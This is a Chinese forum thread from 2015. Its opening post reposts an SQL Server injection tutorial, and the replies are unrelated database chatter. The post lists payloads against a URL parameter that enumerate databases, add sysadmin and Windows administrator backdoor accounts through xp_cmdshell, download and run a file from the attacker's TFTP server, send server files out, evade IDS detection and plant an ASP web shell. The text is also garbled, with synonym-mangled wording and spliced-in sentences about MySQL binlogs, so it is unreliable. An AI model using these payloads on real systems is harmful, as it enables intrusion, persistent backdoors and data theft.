仓酷云

 找回密码
 立即注册
搜索
热搜: 活动 交友 discuz
查看: 1069|回复: 6
打印 上一主题 下一主题

[学习教程] MSSQL网页设计桂林老兵的SQLSERVER初级注进技能 (摘)...

[复制链接]
金色的骷髅 该用户已被删除
跳转到指定楼层
#
发表于 2015-1-16 22:40:04 | 只看该作者 回帖奖励 |正序浏览 |阅读模式

马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
每个Rows_log_event中包含event_type,可选值为WRITE_ROWS_EVENT、UPDATE_ROWS_EVENT、DELETE_ROWS_EVENT。从宏名字就能看出用途。server|sqlserver|初级|技能如今将老兵自己多年的SQLSERVER注进初级技能贡献给撑持老兵的伴侣:


媒介:
便是初级技能,别的基础的注进办法就不胪陈了。
看不懂可查本站的注进基本文章。
为了更好的用好注进,倡议人人看看本站的SQL语法相干文章


[猎取全体数据库名]
selectnamefrommaster.dbo.sysdatabaseswheredbid=7//dbid的值为7以上都是用户数据库


[取得数据表名][将字段值更新为表名,再设法读出这个字段的值便可失掉表名]
selecttop1namefrom数据库名.dbo.sysobjectswherextype=uandstatus>0andnamenotin(table)


[取得数据表字段名][将字段值更新为字段名,再设法读出这个字段的值便可失掉字段名]
selecttop1数据库名.dbo.col_name(object_id(要查询的数据表名),字段列如:1)[where前提]


经由过程SQLSERVER注进毛病建数据库办理员帐号和体系办理员帐号[以后帐号必需是SYSADMIN组]


news.asp?id=2;execmaster.dbo.sp_addlogintest,test;--//增加数据库用户用户test,暗码为test
news.asp?id=2;execmaster.dbo.sp_passwordtest,123456,test;--//假如想改暗码,则用这句(将test的暗码改成123456)
news.asp?id=2;execmaster.dbo.sp_addsrvrolemembertest,sysadmin;--//将test加到sysadmin组,这个组的成员可实行任何操纵
news.asp?id=2;execmaster.dbo.xp_cmdshellnetusertesttest/add;--//增加体系用户test,暗码为test
news.asp?id=2;execmaster.dbo.xp_cmdshellnetlocalgroupadministratorstest/add;--//将体系用户test提拔为办理员


如许,你在他的数据库和体系内都留下了test办理员账号了


上面是怎样从你的服器下载文件file.exe后运转它[条件是你必需将你的电脑设为TFTP服务器,将69端口翻开]


id=2;execmaster.dbo.xp_cmdshelltftp–i你的IPgetfile.exe;--


然后运转这个文件:
id=2;execmaster.dbo.xp_cmdshellfile.exe;--


下载服务器的文件file2.doc到当地TFTP服务器[文件必需存在]:


id=2;execmaster.dbo.xp_cmdshelltftp–i你的IPPutfile2.doc;--


绕过IDS的检测[利用变量]
declare@asysnameset@a=xp_+cmdshellexec@adirc:
declare@asysnameset@a=xp+_cm+dshellexec@adirc:


新加的:


建一个表。只要一个字段,范例为image,将asp内容写进。导出数据库为文件
backupdatabasedbnametodisk=d:webdb.asp;


报错失掉体系操纵体系和数据库体系版本号
id=2and1(select@@VERSION);我们只需要把binlog文件反向执行,每个操作都执行逆操作即可。当然也不是所有的event都反转。Table_mapevent必须还是在Rows_log_event每个操作之前。
第二个灵魂 该用户已被删除
6#
发表于 2015-3-25 09:24:20 | 只看该作者
一个百万级别的基本信息表A,一个百万级别的详细记录表B,A中有个身份证id,B中也有身份id;先要找出A中在B的详细记录。
透明 该用户已被删除
5#
发表于 2015-3-11 08:54:07 | 只看该作者
分区表效率问题肯定是大家关心的问题。在我的试验中,如果按照分区字段进行的查询(过滤)效率会高于未分区表的相同语句。但是如果按照非分区字段进行查询,效率会低于未分区表的相同语句。
分手快乐 该用户已被删除
地板
发表于 2015-3-3 02:26:27 | 只看该作者
学习SQL语言的话如果要学会去做网站就不是很难!但是要做数据库管理的话就有难度了!
小魔女 该用户已被删除
板凳
发表于 2015-2-12 10:09:33 | 只看该作者
原理很简单,对要求长时间计算某一时间点的报表生成和防用户操作错误很有帮助。但是比起Oracle10g的闪回技术还是细粒度不够。可惜!
海妖 该用户已被删除
沙发
发表于 2015-2-5 15:04:18 | 只看该作者
比如,MicrosoftSQLServer2008的某一个版本可以满足现在的这个业务的需要,而且价格还比Oracle11g要便宜,那么这一产品就是适合的。
admin 该用户已被删除
楼主
发表于 2015-1-28 10:35:53 | 只看该作者
SP4是一个累积性的ServicePack,包含自以前的ServicePack发布以来所有的修补程序(包括MS03-031安全公告)。
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|Archiver|手机版|仓酷云 鄂ICP备14007578号-2

GMT+8, 2024-12-23 00:02

Powered by Discuz! X3.2

© 2001-2013 Comsenz Inc.

快速回复 返回顶部 返回列表